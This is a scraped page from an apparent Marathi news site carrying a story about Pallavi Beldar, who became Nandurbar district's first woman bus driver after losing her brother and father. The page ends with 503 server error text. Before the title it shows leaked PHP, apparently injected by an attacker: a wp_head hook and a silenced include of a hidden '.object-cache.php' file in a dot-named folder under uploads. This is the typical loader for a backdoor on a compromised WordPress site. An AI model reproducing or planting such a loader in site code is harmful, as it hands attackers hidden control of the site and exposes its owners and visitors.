add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Nandurbar News: कोरोना काळात वडिलांचा आधार गेला नंतर भावाचा मृत्यू, संकटाशी दोन हात करत झाली जिल्ह्यातील पहिली महिला बस चालक – SOCH INDIA
Menu

देश
Nandurbar News: कोरोना काळात वडिलांचा आधार गेला नंतर भावाचा मृत्यू, संकटाशी दोन हात करत झाली जिल्ह्यातील पहिली महिला बस चालक

nobanner

घरातील कर्त्या माणसाचा आधार गेल्यानंतर दुःख करत न बसता परिस्थितीशी दोन हात करत नंदुरबारसारख्या आदिवासी दुर्गम जिल्ह्यातील शहादा येथील पल्लवी बेलदार या तरुणीने जिल्ह्यात पहिली महिला बस चालक होण्याचा मान मिळवला आहे. पल्लवीच्या हा प्रवास संघर्षमय राहिला असून तिने जिल्ह्यातील शहादा आगारातील बस फेऱ्या मारून आपल्या कामाचा श्रीगणेशा केला आहे.

परिस्थितीशी दोन हात मिळवले यश
पल्लवी बेलदार शहादा बस आगारात महिला चालक म्हणून रुजू झाली आहे.पल्लवीची कहाणी अत्यंत संघर्षमय आहे. कोरोना काळात वडिलांचा आधार गेला त्या अगोदर 2017 मध्ये भावाचा मृत्यू झाला.मोठ्या बहिणीचे लग्न झाल्याने घराची जबाबदारी पल्लवीवर आली. 2019 मध्ये चालकाचे प्रशिक्षण घेत असताना वडील कोरोनात गेले आता काय करावे हा मोठा प्रश्न तिच्या समोर होता. आईचा सांभाळ घराची जबाबदारी आणि एसटी महामंडळ मधील चालकाची ट्रेनिंग या तिघी गोष्टींचा मिलाफ करत परिस्थितीशी दोन हात करण्याचा निर्णय तिने घेतला. या संघर्षमय परिस्थितीत न डगमगता तिने औरंगाबाद येथे आपले प्रशिक्षण पूर्ण केले. प्रशिक्षणानंतर शहादा आगारात बस चालक म्हणून ती जिल्ह्यातील पहिली महिला एसटी ड्रायव्हर म्हणून रुजू झाली.

संघर्ष केल्यास यश नक्की प्राप्त होते
आज कालच्या तरुणी कोणत्याही क्षेत्रात मागे नाहीत त्यांनी मनात कोणताही प्रकारचा दडपण न ठेवता संघर्ष केल्यास यश नक्की प्राप्त होत असते हे पल्लवी ने सिद्ध केले आहे. मनाशी जिद्द बाळगण्याची आवाहनही तिने तरुणींना केली आहे. आपली मुलगी जिल्ह्यातील पहिली बस चालक झाल्याचा सार्थ अभिमान तिच्या आईच्या चेहऱ्यावर दिसून येतो. अभिमानासोबतच तिच्या आईच्या चेहऱ्यावरील आनंदाश्रू पल्लवीच्या यशाची ग्वाही देतात. वडील गेल्यानंतर अत्यंत हलाखीच्या परिस्थितीत बहीण आणि पाहुण्यांनी केलेल्या मदतीवर परिवाराचा सांभाळ करत मिळवलेले यश माझ्यासाठी जगातील सर्वात मोठा आनंद असल्याची प्रतिक्रिया पल्लवीची आई देते.

तरुणींसाठी प्रेरणादायी कहणी
केल्याने होते रे केलेच पाहिजे या उक्ती प्रमाणे आलेल्या संकटात न डगमगता पल्लवीने संघर्ष करत आपलं प्रशिक्षण पूर्ण करून जिल्ह्यातील पहिली महिला बस चालक होण्याचा सन्मान मिळवला. तिच्यासाठी जशी अभिमानाची गोष्ट आहे तशीच आजच्या नवीन पिढीसाठी आणि तरुणींसाठी प्रेरणादायी कहणी ठरेल हे मात्र निश्चित

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.